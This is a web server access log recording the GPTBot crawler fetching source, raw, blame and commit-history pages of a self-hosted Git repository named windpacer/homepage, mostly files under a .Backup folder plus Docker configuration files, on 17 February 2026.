"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" -[17/Feb/2026:13:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11649] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 11344] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 13282] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" -[17/Feb/2026:13:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" -[17/Feb/2026:13:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11497] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 74.7.227.38] [Length 10615] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" -[17/Feb/2026:13:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" -[17/Feb/2026:13:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" -[17/Feb/2026:13:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" -[17/Feb/2026:13:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10860] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.tsx" -[17/Feb/2026:13:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 10980] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" -[17/Feb/2026:13:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" -[17/Feb/2026:13:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" -[17/Feb/2026:13:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" -[17/Feb/2026:13:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" -[17/Feb/2026:13:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" -[17/Feb/2026:13:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" -[17/Feb/2026:13:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" -[17/Feb/2026:13:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13902] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" -[17/Feb/2026:13:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" -[17/Feb/2026:13:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" -[17/Feb/2026:13:27:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/README.md" -[17/Feb/2026:13:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" -[17/Feb/2026:13:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11883] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11301] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" -[17/Feb/2026:13:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx" -[17/Feb/2026:13:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 74.7.227.38] [Length 11443] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 10727] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" -[17/Feb/2026:13:27:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/halfweekly" [Client 74.7.227.38] [Length 8387] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 12588] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:27:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 11578] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" -[17/Feb/2026:13:27:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11212] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" -[17/Feb/2026:13:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" -[17/Feb/2026:13:27:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" -[17/Feb/2026:13:27:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10381] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" -[17/Feb/2026:13:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" -[17/Feb/2026:13:27:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:13:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 74.7.227.38] [Length 14250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:13:27:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 74.7.227.38] [Length 14389] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:13:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 12805] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" -[17/Feb/2026:13:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 10316] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" -[17/Feb/2026:13:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 13001] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" -[17/Feb/2026:13:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 